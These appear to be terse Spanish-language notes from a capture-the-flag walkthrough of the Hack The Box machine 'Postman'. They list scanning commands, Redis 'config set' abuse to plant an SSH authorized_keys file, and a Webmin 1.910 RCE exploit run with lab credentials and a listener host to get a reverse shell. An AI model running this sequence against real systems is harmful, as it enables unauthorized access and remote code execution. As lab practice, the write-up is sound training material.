nmap -A -p- -oA output 10.129.2.1 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA postman 10.129.2.1

nmap -sU -O -p- -oA postman-udp 10.129.2.1

nikto -h 10.129.2.1:80

Pasted image 20220125112313.png

Pasted image 20220125112537.png

redis-cli -h 10.129.2.1

config get dir

config set dir "/etc/"

config set dir "/var/lib/redis"

Pasted image 20220125163552.png

http://10.129.2.1/js

Pasted image 20220125164036.png

https://10.129.2.1:10000

Pasted image 20220125164419.png

Vemos un webmin login. Pero sin credenciales es imposible.

Pasted image 20220125170933.png

searchsploit webmin

Pasted image 20220125171320.png

wfuzz -c --hc=404 -w /SecLists/Discovery/Web-Content/IIS.fuzz.txt http://10.129.2.1/FUZZ

Pasted image 20220125172046.png

http://10.129.2.1/upload

Pasted image 20220125172244.png

openssl s_client -connect 10.129.2.1:10000

Pasted image 20220125172614.png

Encontramos un correo root@Postman

Pasted image 20220125173128.png

config set dir "/var/lib/redis.ssh"

config set dbfilename authorized_keys

ssh-keygen

Esto no me funciono.

Pasted image 20220125173658.png

https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/blob/master/exploit_poc.py

redis-cli -h 10.129.2.1

config set dbfilename authorized_keys

save

cat key | redis-cli -h 10.129.2.1 -x set 1

Pasted image 20220125183756.png

python3 exploit_poc.py --ip_address=10.129.2.1 --port=10000 --lhost=10.10.14.135 --lport=443 --user=Matt --pass=computer2008

Pasted image 20220125185257.png

whoami

Pasted image 20220125190024.png

boxes

copyright©2022 Cu3rv0x all rights reserved